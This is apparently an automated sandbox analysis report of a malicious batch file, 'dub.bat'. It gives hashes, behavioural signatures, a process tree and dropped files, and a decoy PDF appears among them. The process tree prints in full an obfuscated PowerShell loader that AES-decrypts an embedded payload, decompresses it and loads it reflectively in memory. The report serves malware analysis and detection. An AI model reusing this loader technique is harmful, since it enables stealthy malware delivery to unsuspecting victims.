Analysis
max time kernel: 148s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-02-2023 03:50

Static task: static1
Behavioral task: behavioral1
  Sample: dub.bat
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: dub.bat
  Resource: win10-20220901-en
General
Target: dub.bat
Size: 226KB
MD5: cf81b345541f19ab200b4d0de4a64962
SHA1: 56dcdd340cb470fcd42c0cd1531d1eac8fcd7980
SHA256: 07a0759d5b376fc57f2ad9c5a32d59829934828b862591225c43421044ffd4ec
SHA512: ac960f497fc3354831a76c1a385e95c65b66d862bd09e24b73bedb8e969d8221516e8d7a6eba257c5613c61d82d16305fd672a5112d441b97e5fefa0d88a7e97
SSDEEP: 6144:LiEz3MvivRRFAFNmR3QaqnMadPo7lNhkLPUoV:mivRRFsNmwulNeLcoV
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: dub.bat.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation (dub.bat.exe)

Executes dropped EXE (1 IoCs)
Processes: dub.bat.exe
  pid 2660: dub.bat.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: AcroRd32.exe
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (AcroRd32.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (AcroRd32.exe)

Modifies Internet Explorer settings (1 IoCs)
Processes: AcroRd32.exe
  Key created: \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (AcroRd32.exe)

Modifies registry class (1 IoCs)
Processes: dub.bat.exe
  Key created: \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings (dub.bat.exe)

Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes: dub.bat.exe, AcroRd32.exe
  pid 2660: dub.bat.exe (2 entries)
  pid 4824: AcroRd32.exe (20 entries)

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: dub.bat.exe
  Token: SeDebugPrivilege, pid 2660 (dub.bat.exe)

Suspicious use of FindShellTrayWindow (1 IoCs)
Processes: AcroRd32.exe
  pid 4824: AcroRd32.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
Processes: AcroRd32.exe
  pid 4824: AcroRd32.exe (6 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: cmd.exe, dub.bat.exe, AcroRd32.exe, RdrCEF.exe
  PID 964 wrote to memory of 2660: cmd.exe -> dub.bat.exe (2 entries)
  PID 2660 wrote to memory of 4824: dub.bat.exe -> AcroRd32.exe (3 entries)
  PID 4824 wrote to memory of 4344: AcroRd32.exe -> RdrCEF.exe (3 entries)
  PID 4344 wrote to memory of 3492: RdrCEF.exe -> RdrCEF.exe (repeated)
  PID 4344 wrote to memory of 4880: RdrCEF.exe -> RdrCEF.exe (repeated)
  The two RdrCEF.exe -> RdrCEF.exe rows account for the remaining 56 of the 64 entries; the identical rows are collapsed here.
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dub.bat"
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\dub.bat.exe (depth 2)
    Command line: "dub.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utCHT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dub.bat').Split([Environment]::NewLine);foreach ($sWAOq in $utCHT) { if ($sWAOq.StartsWith(':: ')) { $upQKs = $sWAOq.Substring(3); break; }; };$JjLmi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($upQKs);$YkqlI = New-Object System.Security.Cryptography.AesManaged;$YkqlI.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YkqlI.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YkqlI.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kiFQHKEXvznY0Nsnm3fp94kgb604e6Feq9TQN777Yxs=');$YkqlI.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5Ca2LFqXHi3HVlKnNoz3+g==');$vFmBU = $YkqlI.CreateDecryptor();$JjLmi = $vFmBU.TransformFinalBlock($JjLmi, 0, $JjLmi.Length);$vFmBU.Dispose();$YkqlI.Dispose();$fuUUI = New-Object System.IO.MemoryStream(, $JjLmi);$gvEAD = New-Object System.IO.MemoryStream;$wMQDT = New-Object System.IO.Compression.GZipStream($fuUUI, [IO.Compression.CompressionMode]::Decompress);$wMQDT.CopyTo($gvEAD);$wMQDT.Dispose();$fuUUI.Dispose();$gvEAD.Dispose();$JjLmi = $gvEAD.ToArray();$vodVl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JjLmi);$UBeHH = $vodVl.EntryPoint;$UBeHH.Invoke($null, (, [string[]] ('')))
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (depth 3)
      Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\international_tariff_consumer.pdf"
      - Checks processor information in registry
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 4)
        Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0D5C2E8456D11B87B7259BE2CD8DD6AA --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6BC7FF1122681FC1E47430731F4CECAF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6BC7FF1122681FC1E47430731F4CECAF --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=77F28B364B1D4DF417F5115F8B3B977E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=77F28B364B1D4DF417F5115F8B3B977E --renderer-client-id=4 --mojo-platform-channel-handle=2188 --allow-no-sandbox-job /prefetch:1

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FE225CFDA142A00BAB27BA716FDD0939 --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7643A7BA676F9F4D2354CF3D8BB749E1 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 5)
          Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=150611A030E1EB59485B96C1D7AECA6F --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe (depth 1)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\dub.bat.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Temp\international_tariff_consumer.pdf
  Filesize: 144KB
  MD5: c11925db0aeee6ed50d287441b8e1cec
  SHA1: 38e8070658872826d9afdd17df1e73475f62a286
  SHA256: ff75f9d0cad2ad4e55221d749a5ec0347d7b02df2da8c473d76ea1ba7aaeadb6
  SHA512: 9178f928fb370abcf3deb39fd7bd9e5edfc01f8424dd27cf6f0f030261b037b310aed46e651302ca0f9e3e91f692f3d49d0403db9d201388941760eec596c059
Memory dumps

memory/2660-134-0x000001CC90040000-0x000001CC90062000-memory.dmp
  Filesize: 136KB
memory/2660-136-0x00007FF9E7FD0000-0x00007FF9E8A91000-memory.dmp
  Filesize: 10.8MB
memory/2660-132-0x0000000000000000-mapping.dmp
memory/2660-162-0x00007FF9E7FD0000-0x00007FF9E8A91000-memory.dmp
  Filesize: 10.8MB
memory/2684-149-0x0000000000000000-mapping.dmp
memory/3304-157-0x0000000000000000-mapping.dmp
memory/3492-141-0x0000000000000000-mapping.dmp
memory/4344-139-0x0000000000000000-mapping.dmp
memory/4436-160-0x0000000000000000-mapping.dmp
memory/4592-154-0x0000000000000000-mapping.dmp
memory/4824-137-0x0000000000000000-mapping.dmp
memory/4880-144-0x0000000000000000-mapping.dmp